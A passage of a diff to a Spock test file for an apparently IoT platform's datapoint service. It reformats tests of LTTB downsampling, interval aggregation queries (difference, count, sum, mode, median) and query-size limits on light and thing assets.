-        assert diffDatapoints1[0].value == 0 // Initial value was 10, nothing happened since
-        assert diffDatapoints1[1].value == 5 // First bump from 10 -> 15, so difference is 5.
-        assert diffDatapoints1[2].value == 75 // 15 -> 90
-        assert diffDatapoints1[3].value == -70 // 90 -> 20
-        assert diffDatapoints1[4].value == 5 // 20 -> 25
-        assert diffDatapoints1[5].value == 5 // 25 -> 30
-        assert diffDatapoints1[6].value == 0 // Because nothing happened the spare milliseconds of time
-
-        when: "requesting interval datapoints using COUNT"
-        def countDatapoints1 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointIntervalQuery(queryTime60, queryTimeNow, "5 minutes", AssetDatapointIntervalQuery.Formula.COUNT, true)
-        )
-
-        then: "COUNT datapoints should be correct"
-        assert countDatapoints1.size() == 13 // Because 60/5=12, plus an extra datapoint for the spare milliseconds of time.
-        assert countDatapoints1[0].timestamp == time60.toEpochMilli()
-        assert countDatapoints1[1].timestamp == time60.plus(5, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[2].timestamp == time60.plus(10, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[3].timestamp == time60.plus(15, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[4].timestamp == time60.plus(20, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[5].timestamp == time60.plus(25, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[6].timestamp == time60.plus(30, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[7].timestamp == time60.plus(35, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[8].timestamp == time60.plus(40, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[9].timestamp == time60.plus(45, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[10].timestamp == time60.plus(50, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[11].timestamp == time60.plus(55, ChronoUnit.MINUTES).toEpochMilli()
-        assert countDatapoints1[12].timestamp == timeNow.toEpochMilli()
-        assert countDatapoints1[0].value == null
-        assert countDatapoints1[1].value == null
-        assert countDatapoints1[2].value == null
-        assert countDatapoints1[3].value == null
-        assert countDatapoints1[4].value == null
-        assert countDatapoints1[5].value == null
-        assert countDatapoints1[6].value == 1
-        assert countDatapoints1[7].value == 1
-        assert countDatapoints1[8].value == 1
-        assert countDatapoints1[9].value == 1
-        assert countDatapoints1[10].value == 1
-        assert countDatapoints1[11].value == 1
-        assert countDatapoints1[12].value == null // Spare milliseconds of time
-
-        when: "requesting interval datapoints using SUM"
-        def sumDatapoints1 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "10 minutes", AssetDatapointIntervalQuery.Formula.SUM, true)
-        )
-
-        then: "SUM datapoints should be correct"
-        assert sumDatapoints1.size() == 4 // Because 30/10=3, plus an extra datapoint for the spare milliseconds of time.
-        assert sumDatapoints1[0].timestamp == time30.toEpochMilli()
-        assert sumDatapoints1[1].timestamp == time30.plus(10, ChronoUnit.MINUTES).toEpochMilli()
-        assert sumDatapoints1[2].timestamp == time30.plus(20, ChronoUnit.MINUTES).toEpochMilli()
-        assert sumDatapoints1[3].timestamp == timeNow.toEpochMilli()
-        assert sumDatapoints1[0].value == (10 + 15)
-        assert sumDatapoints1[1].value == (90 + 20)
-        assert sumDatapoints1[2].value == (25 + 30)
-        assert sumDatapoints1[3].value == null // Spare milliseconds of time
-
-        when: "requesting interval datapoints using MODE"
-        def modeDatapoints1 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "5 minutes", AssetDatapointIntervalQuery.Formula.MODE, true)
-        )
-
-        then: "MODE datapoints should be correct"
-        assert modeDatapoints1.size() == 6
-        assert modeDatapoints1[0].timestamp == time30.toEpochMilli()
-        assert modeDatapoints1[1].timestamp == time30.plus(5, ChronoUnit.MINUTES).toEpochMilli()
-        assert modeDatapoints1[2].timestamp == time30.plus(10, ChronoUnit.MINUTES).toEpochMilli()
-        assert modeDatapoints1[3].timestamp == time30.plus(15, ChronoUnit.MINUTES).toEpochMilli()
-        assert modeDatapoints1[4].timestamp == time30.plus(20, ChronoUnit.MINUTES).toEpochMilli()
-        assert modeDatapoints1[5].timestamp == time30.plus(25, ChronoUnit.MINUTES).toEpochMilli()
-        assert modeDatapoints1[0].value == 10
-        assert modeDatapoints1[1].value == 15
-        assert modeDatapoints1[2].value == 90
-        assert modeDatapoints1[3].value == 20
-        assert modeDatapoints1[4].value == 25
-        assert modeDatapoints1[5].value == 30
-
-        when: "requesting interval datapoints using MEDIAN"
-        def medianDatapoints1 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "15 minutes", AssetDatapointIntervalQuery.Formula.MEDIAN, true)
-        )
-
-        then: "MEDIAN datapoints should be correct"
-        assert medianDatapoints1.size() == 3 // Because 30/15=2, plus an extra datapoint for the spare milliseconds of time.
-        assert medianDatapoints1[0].timestamp == time30.toEpochMilli()
-        assert medianDatapoints1[1].timestamp == time30.plus(15, ChronoUnit.MINUTES).toEpochMilli()
-        assert medianDatapoints1[2].timestamp == timeNow.toEpochMilli()
-        assert medianDatapoints1[0].value == 15
-        assert medianDatapoints1[1].value == 25
-        assert medianDatapoints1[2].value == null // Spare milliseconds of time
-
-        when: "adding an additional datapoint of 90"
-        assetDatapointService.upsertValue(asset.getId(), attributeName, 90d, dateTime.minus(1, ChronoUnit.MINUTES))
-
-        and: "requesting interval datapoints using MODE with a full interval"
-        def modeDatapoints2 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "60 minutes", AssetDatapointIntervalQuery.Formula.MODE, true)
-        )
-
-        then: "MODE datapoints should return 90, because it is most common within the interval"
-        assert modeDatapoints2.size() == 1
-        assert modeDatapoints2[0].timestamp == time60.toEpochMilli()
-        assert modeDatapoints2[0].value == 90
+    then: "datapoints should exist"
+    def allDatapoints = new ArrayList<ValueDatapoint>()
+    conditions.eventually {
+      allDatapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
+      assert allDatapoints.size() == 5
     }
 
-    def "All query should return the correct data when the maximum is respected"() {
+    /* ------------------------- */
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    and: "requesting 50 datapoints using the LTTB algorithm should return 5 values"
+    def lttbDatapoints1 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointLTTBQuery(dateTime.minusMinutes(30), dateTime, 5)
+            )
+    assert lttbDatapoints1.size() == 5
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        assetDatapointService.maxAmountOfQueryPoints = 1000
-
-        when: "requesting the first light asset in City realm"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                        .types(LightAsset.class)
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .names("Light 1")
-        )
-
-        then: "asset should exist and be correct"
-        def assetName = "Light 1"
-        def attributeName = "brightness"
-        def dateTime = LocalDateTime.now()
-        assert asset != null // light 1, 2 and 3
-        assert asset.name == assetName
-        assert asset.attributes.has(attributeName)
-
-        and: "no datapoints should exist"
-        conditions.eventually {
-            def datapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
-            assert datapoints.isEmpty()
-        }
-
-
-        /* ------------------------- */
-
-        when: "datapoints are added to the asset"
-        assetDatapointService.upsertValues(asset.getId(), attributeName,
-                [
-                        new ValueDatapoint<>(dateTime.minusMinutes(25).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 50d),
-                        new ValueDatapoint<>(dateTime.minusMinutes(20).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 40d),
-                        new ValueDatapoint<>(dateTime.minusMinutes(15).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 30d),
-                        new ValueDatapoint<>(dateTime.minusMinutes(10).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 20d),
-                        new ValueDatapoint<>(dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 10d),
-                ]
-        )
-
-        then: "datapoints should exist"
-        def allDatapoints = new ArrayList<ValueDatapoint>()
-        conditions.eventually {
-            allDatapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
-            assert allDatapoints.size() == 5
-        }
-
-        /* ------------------------- */
-
-        and: "requesting 5 datapoints should return 5 values"
-        def allDatapoints1 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointAllQuery(dateTime.minusMinutes(30), dateTime)
-        )
-        assert allDatapoints1.size() == 5
-
-        /* ------------------------- */
-
-        when: "the OR_DATA_POINTS_QUERY_LIMIT environment variable is updated to 2"
-        assetDatapointService.maxAmountOfQueryPoints = 2
-
-        and: "the same datapoints are being requested"
-        assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointAllQuery(dateTime.minusMinutes(30), dateTime)
-        )
-
-        then: "no points should be returned"
-        thrown(DatapointQueryTooLargeException)
-
-        cleanup: "Remove the limit on datapoint querying"
-        assetDatapointService.maxAmountOfQueryPoints = 0
+    and: "the 5 values are equal to 5 values in 'allDatapoints'"
+    def index = 0
+    Collections.reverse(allDatapoints) // since they're returned in reverse other (from new to old)
+    allDatapoints.stream().forEach {dp -> {
+        assert dp.timestamp == lttbDatapoints1[index].timestamp
+        assert dp.value == lttbDatapoints1[index].value
+        index++
+      }
     }
+
+    and: "requesting 3 datapoints using LTTB should return 50, 40 and 10 to reflect the algorithm spec."
+    def lttbDatapoints2 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointLTTBQuery(dateTime.minusMinutes(30), dateTime, 3)
+            )
+    assert lttbDatapoints2.size() == 3
+    assert lttbDatapoints2[0].value == 50d
+    assert lttbDatapoints2[1].value == 40d
+    assert lttbDatapoints2[2].value == 10d
+
+
+    /* ------------------------- */
+
+    when: "the datapoints are cleared"
+    assetDatapointService.purgeDataPoints()
+
+    and: "datapoints are added that have a spike in value, it should be included in any downsample"
+    assetDatapointService.upsertValues(asset.getId(), attributeName,
+            [
+              // placing them in a random order to verify order that is returned with the query
+              new ValueDatapoint<>(dateTime.minusMinutes(10).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 25d),
+              new ValueDatapoint<>(dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 30d),
+              new ValueDatapoint<>(dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 10d),
+              new ValueDatapoint<>(dateTime.minusMinutes(20).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 90d),
+              new ValueDatapoint<>(dateTime.minusMinutes(25).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 15d),
+              new ValueDatapoint<>(dateTime.minusMinutes(15).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 20d),
+            ]
+            )
+
+    then: "the spike should be present as the 2nd value"
+    def lttbDatapoints3 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointLTTBQuery(dateTime.minusMinutes(60), dateTime, 4)
+            )
+    assert lttbDatapoints3.size() == 4
+    assert lttbDatapoints3[0].value == 10d
+    assert lttbDatapoints3[1].value == 90d
+    assert lttbDatapoints3[2].value == 20d
+    assert lttbDatapoints3[3].value == 30d
+
+    and: "returned datapoints should be in chronological order" // so from earliest to most recent
+    def index2 = 0
+    lttbDatapoints3.toList().stream().forEach { dp -> {
+        if(index2> 0) {
+          assert dp.timestamp> lttbDatapoints3[index2 - 1].timestamp
+        }
+        index2++
+      }
+    }
+  }
+
+
+
+  def "Lttb should not accept anything else than boolean and number"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    assetDatapointService.maxAmountOfQueryPoints = 1000
+
+    when: "a thing asset is added to the building realm"
+    def thingId = UniqueIdentifierGenerator.generateId("TestThing")
+    def thingAsset = new ThingAsset("TestThing")
+            .setId(thingId)
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+            .setLocation(new GeoJSONPoint(0, 0))
+            .addAttributes(
+            new Attribute<>("status", ValueType.BOOLEAN, null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS)),
+            new Attribute<>("deviceId", ValueType.TEXT, null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS)),
+            )
+    thingAsset = assetStorageService.merge(thingAsset)
+
+    and: "add datapoints to the attributes"
+    assetDatapointService.upsertValue(thingAsset.getId(), "status", true, LocalDateTime.now())
+    assetDatapointService.upsertValue(thingAsset.getId(), "deviceId", "abcdefghijklmnopqrstuvwxyz", LocalDateTime.now())
+
+
+    then: "datapoints should exist"
+    conditions.eventually {
+      def booleanDatapoints = assetDatapointService.getDatapoints(new AttributeRef(thingAsset.getId(), "status"))
+      assert booleanDatapoints.size() == 1
+      def textDatapoints = assetDatapointService.getDatapoints(new AttributeRef(thingAsset.getId(), "deviceId"))
+      assert textDatapoints.size() == 1
+    }
+
+    and: "lttbQuery with boolean should not throw exception"
+    conditions.eventually {
+      def lttbDatapoints = assetDatapointService.queryDatapoints(
+      thingAsset.getId(),
+      thingAsset.getAttribute("status").orElseThrow({
+        new RuntimeException("Missing attribute")
+      }),
+      new AssetDatapointLTTBQuery(LocalDateTime.now().minusMinutes(5), LocalDateTime.now(), 3)
+      )
+      assert lttbDatapoints.size() == 1
+      assert lttbDatapoints[0].value == 1.0 // Aka true as boolean
+    }
+
+    when: "lttbQuery is created with text, it should throw exception"
+    assetDatapointService.queryDatapoints(
+            thingAsset.getId(),
+            thingAsset.getAttribute("deviceId").orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointLTTBQuery(LocalDateTime.now().minusMinutes(5), LocalDateTime.now(), 3)
+            )
+
+    then: "exception to be thrown"
+    IllegalStateException ex = thrown(IllegalStateException)
+    assert ex.getMessage() == "Query of type LTTB requires either a number or a boolean attribute."
+  }
+
+
+
+  def "Interval query should be returned correctly and in chronological order"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    assetDatapointService.maxAmountOfQueryPoints = 1000
+
+
+    when: "requesting the first light asset in City realm"
+    def asset = assetStorageService.find(
+            new AssetQuery()
+            .types(LightAsset.class)
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .names("Light 1")
+            )
+
+    then: "asset should exist and be correct"
+    def assetName = "Light 1"
+    def attributeName = "brightness"
+    def dateTime = LocalDateTime.of(2025, Month.AUGUST, 7, 9, 00)
+    def queryTime30 = dateTime.minus(30, ChronoUnit.MINUTES)
+    def queryTime60 = dateTime.minus(60, ChronoUnit.MINUTES)
+    def queryTimeNow = dateTime
+    def time30 = queryTime30.atZone(ZoneId.systemDefault()).toInstant()
+    def time60 = queryTime60.atZone(ZoneId.systemDefault()).toInstant()
+    def timeNow = queryTimeNow.atZone(ZoneId.systemDefault()).toInstant()
+    assert asset != null // light 1, 2 and 3
+    assert asset.name == assetName
+    assert asset.attributes.has(attributeName)
+
+    and: "no datapoints should exist"
+    conditions.eventually {
+      def datapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
+      assert datapoints.isEmpty()
+    }
+
+
+    /* ------------------------- */
+
+    when: "the first datapoints are added to the asset in random order"
+    assetDatapointService.upsertValue(asset.getId(), attributeName, 25d, dateTime.minus(10, ChronoUnit.MINUTES))
+    assetDatapointService.upsertValue(asset.getId(), attributeName, 30d, dateTime.minus(5, ChronoUnit.MINUTES))
+    assetDatapointService.upsertValue(asset.getId(), attributeName, 10d, dateTime.minus(30, ChronoUnit.MINUTES))
+    assetDatapointService.upsertValue(asset.getId(), attributeName, 90d, dateTime.minus(20, ChronoUnit.MINUTES))
+    assetDatapointService.upsertValue(asset.getId(), attributeName, 15d, dateTime.minus(25, ChronoUnit.MINUTES))
+    assetDatapointService.upsertValue(asset.getId(), attributeName, 20d, dateTime.minus(15, ChronoUnit.MINUTES))
+
+    then: "datapoints should exist"
+    def allDatapoints = new ArrayList<AssetDatapoint>()
+    conditions.eventually {
+      allDatapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
+      assert allDatapoints.size() == 6
+    }
+
+    /* ------------------------- */
+
+    and: "returned datapoints (without gapfill) should be in chronological order" // so from earliest to most recent
+    def intervalDatapoints1 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointIntervalQuery(queryTime60, queryTimeNow, "1 minute", AssetDatapointIntervalQuery.Formula.AVG, false)
+            )
+    assert intervalDatapoints1.size() == 6
+    def index = 0
+    intervalDatapoints1.toList().stream().forEach { dp -> {
+        if(index> 0) {
+          assert dp.timestamp> intervalDatapoints1[index - 1].timestamp
+        }
+        index++
+      }
+    }
+
+    and: "returned datapoints (with gapfill) should be in chronological order" // so from earliest to most recent
+    def intervalDatapoints2 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointIntervalQuery(queryTime60, queryTimeNow, "1 minute", AssetDatapointIntervalQuery.Formula.AVG, true)
+            )
+    assert intervalDatapoints2.size() == 61 // because 60/1=60, plus an extra datapoint for the spare milliseconds of time
+    def index2 = 0
+    intervalDatapoints2.toList().stream().forEach { dp -> {
+        if(index2> 0) {
+          assert dp.timestamp> intervalDatapoints2[index2 - 1].timestamp
+        }
+        index2++
+      }
+    }
+
+    when: "requesting interval datapoints using DIFFERENCE"
+    def diffDatapoints1 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "5 minutes", AssetDatapointIntervalQuery.Formula.DIFFERENCE, true)
+            )
+
+    then: "DIFFERENCE datapoints should be correct"
+    assert diffDatapoints1.size() == 7 // Because 30/5=6, plus an extra datapoint for the spare milliseconds of time.
+    assert diffDatapoints1[0].timestamp == time30.toEpochMilli()
+    assert diffDatapoints1[1].timestamp == time30.plus(5, ChronoUnit.MINUTES).toEpochMilli()
+    assert diffDatapoints1[2].timestamp == time30.plus(10, ChronoUnit.MINUTES).toEpochMilli()
+    assert diffDatapoints1[3].timestamp == time30.plus(15, ChronoUnit.MINUTES).toEpochMilli()
+    assert diffDatapoints1[4].timestamp == time30.plus(20, ChronoUnit.MINUTES).toEpochMilli()
+    assert diffDatapoints1[5].timestamp == time30.plus(25, ChronoUnit.MINUTES).toEpochMilli()
+    assert diffDatapoints1[6].timestamp == timeNow.toEpochMilli()
+    assert diffDatapoints1[0].value == 0 // Initial value was 10, nothing happened since
+    assert diffDatapoints1[1].value == 5 // First bump from 10 -> 15, so difference is 5.
+    assert diffDatapoints1[2].value == 75 // 15 -> 90
+    assert diffDatapoints1[3].value == -70 // 90 -> 20
+    assert diffDatapoints1[4].value == 5 // 20 -> 25
+    assert diffDatapoints1[5].value == 5 // 25 -> 30
+    assert diffDatapoints1[6].value == 0 // Because nothing happened the spare milliseconds of time
+
+    when: "requesting interval datapoints using COUNT"
+    def countDatapoints1 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointIntervalQuery(queryTime60, queryTimeNow, "5 minutes", AssetDatapointIntervalQuery.Formula.COUNT, true)
+            )
+
+    then: "COUNT datapoints should be correct"
+    assert countDatapoints1.size() == 13 // Because 60/5=12, plus an extra datapoint for the spare milliseconds of time.
+    assert countDatapoints1[0].timestamp == time60.toEpochMilli()
+    assert countDatapoints1[1].timestamp == time60.plus(5, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[2].timestamp == time60.plus(10, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[3].timestamp == time60.plus(15, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[4].timestamp == time60.plus(20, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[5].timestamp == time60.plus(25, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[6].timestamp == time60.plus(30, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[7].timestamp == time60.plus(35, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[8].timestamp == time60.plus(40, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[9].timestamp == time60.plus(45, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[10].timestamp == time60.plus(50, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[11].timestamp == time60.plus(55, ChronoUnit.MINUTES).toEpochMilli()
+    assert countDatapoints1[12].timestamp == timeNow.toEpochMilli()
+    assert countDatapoints1[0].value == null
+    assert countDatapoints1[1].value == null
+    assert countDatapoints1[2].value == null
+    assert countDatapoints1[3].value == null
+    assert countDatapoints1[4].value == null
+    assert countDatapoints1[5].value == null
+    assert countDatapoints1[6].value == 1
+    assert countDatapoints1[7].value == 1
+    assert countDatapoints1[8].value == 1
+    assert countDatapoints1[9].value == 1
+    assert countDatapoints1[10].value == 1
+    assert countDatapoints1[11].value == 1
+    assert countDatapoints1[12].value == null // Spare milliseconds of time
+
+    when: "requesting interval datapoints using SUM"
+    def sumDatapoints1 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "10 minutes", AssetDatapointIntervalQuery.Formula.SUM, true)
+            )
+
+    then: "SUM datapoints should be correct"
+    assert sumDatapoints1.size() == 4 // Because 30/10=3, plus an extra datapoint for the spare milliseconds of time.
+    assert sumDatapoints1[0].timestamp == time30.toEpochMilli()
+    assert sumDatapoints1[1].timestamp == time30.plus(10, ChronoUnit.MINUTES).toEpochMilli()
+    assert sumDatapoints1[2].timestamp == time30.plus(20, ChronoUnit.MINUTES).toEpochMilli()
+    assert sumDatapoints1[3].timestamp == timeNow.toEpochMilli()
+    assert sumDatapoints1[0].value == (10 + 15)
+    assert sumDatapoints1[1].value == (90 + 20)
+    assert sumDatapoints1[2].value == (25 + 30)
+    assert sumDatapoints1[3].value == null // Spare milliseconds of time
+
+    when: "requesting interval datapoints using MODE"
+    def modeDatapoints1 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "5 minutes", AssetDatapointIntervalQuery.Formula.MODE, true)
+            )
+
+    then: "MODE datapoints should be correct"
+    assert modeDatapoints1.size() == 6
+    assert modeDatapoints1[0].timestamp == time30.toEpochMilli()
+    assert modeDatapoints1[1].timestamp == time30.plus(5, ChronoUnit.MINUTES).toEpochMilli()
+    assert modeDatapoints1[2].timestamp == time30.plus(10, ChronoUnit.MINUTES).toEpochMilli()
+    assert modeDatapoints1[3].timestamp == time30.plus(15, ChronoUnit.MINUTES).toEpochMilli()
+    assert modeDatapoints1[4].timestamp == time30.plus(20, ChronoUnit.MINUTES).toEpochMilli()
+    assert modeDatapoints1[5].timestamp == time30.plus(25, ChronoUnit.MINUTES).toEpochMilli()
+    assert modeDatapoints1[0].value == 10
+    assert modeDatapoints1[1].value == 15
+    assert modeDatapoints1[2].value == 90
+    assert modeDatapoints1[3].value == 20
+    assert modeDatapoints1[4].value == 25
+    assert modeDatapoints1[5].value == 30
+
+    when: "requesting interval datapoints using MEDIAN"
+    def medianDatapoints1 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "15 minutes", AssetDatapointIntervalQuery.Formula.MEDIAN, true)
+            )
+
+    then: "MEDIAN datapoints should be correct"
+    assert medianDatapoints1.size() == 3 // Because 30/15=2, plus an extra datapoint for the spare milliseconds of time.
+    assert medianDatapoints1[0].timestamp == time30.toEpochMilli()
+    assert medianDatapoints1[1].timestamp == time30.plus(15, ChronoUnit.MINUTES).toEpochMilli()
+    assert medianDatapoints1[2].timestamp == timeNow.toEpochMilli()
+    assert medianDatapoints1[0].value == 15
+    assert medianDatapoints1[1].value == 25
+    assert medianDatapoints1[2].value == null // Spare milliseconds of time
+
+    when: "adding an additional datapoint of 90"
+    assetDatapointService.upsertValue(asset.getId(), attributeName, 90d, dateTime.minus(1, ChronoUnit.MINUTES))
+
+    and: "requesting interval datapoints using MODE with a full interval"
+    def modeDatapoints2 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "60 minutes", AssetDatapointIntervalQuery.Formula.MODE, true)
+            )
+
+    then: "MODE datapoints should return 90, because it is most common within the interval"
+    assert modeDatapoints2.size() == 1
+    assert modeDatapoints2[0].timestamp == time60.toEpochMilli()
+    assert modeDatapoints2[0].value == 90
+  }
+
+  def "All query should return the correct data when the maximum is respected"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    assetDatapointService.maxAmountOfQueryPoints = 1000
+
+    when: "requesting the first light asset in City realm"
+    def asset = assetStorageService.find(
+            new AssetQuery()
+            .types(LightAsset.class)
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .names("Light 1")
+            )
+
+    then: "asset should exist and be correct"
+    def assetName = "Light 1"
+    def attributeName = "brightness"
+    def dateTime = LocalDateTime.now()
+    assert asset != null // light 1, 2 and 3
+    assert asset.name == assetName
+    assert asset.attributes.has(attributeName)
+
+    and: "no datapoints should exist"
+    conditions.eventually {
+      def datapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
+      assert datapoints.isEmpty()
+    }
+
+
+    /* ------------------------- */
+
+    when: "datapoints are added to the asset"
+    assetDatapointService.upsertValues(asset.getId(), attributeName,
+            [
+              new ValueDatapoint<>(dateTime.minusMinutes(25).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 50d),
+              new ValueDatapoint<>(dateTime.minusMinutes(20).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 40d),
+              new ValueDatapoint<>(dateTime.minusMinutes(15).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 30d),
+              new ValueDatapoint<>(dateTime.minusMinutes(10).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 20d),
+              new ValueDatapoint<>(dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 10d),
+            ]
+            )
+
+    then: "datapoints should exist"
+    def allDatapoints = new ArrayList<ValueDatapoint>()
+    conditions.eventually {
+      allDatapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
+      assert allDatapoints.size() == 5
+    }
+
+    /* ------------------------- */
+
+    and: "requesting 5 datapoints should return 5 values"
+    def allDatapoints1 = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointAllQuery(dateTime.minusMinutes(30), dateTime)
+            )
+    assert allDatapoints1.size() == 5
+
+    /* ------------------------- */
+
+    when: "the OR_DATA_POINTS_QUERY_LIMIT environment variable is updated to 2"
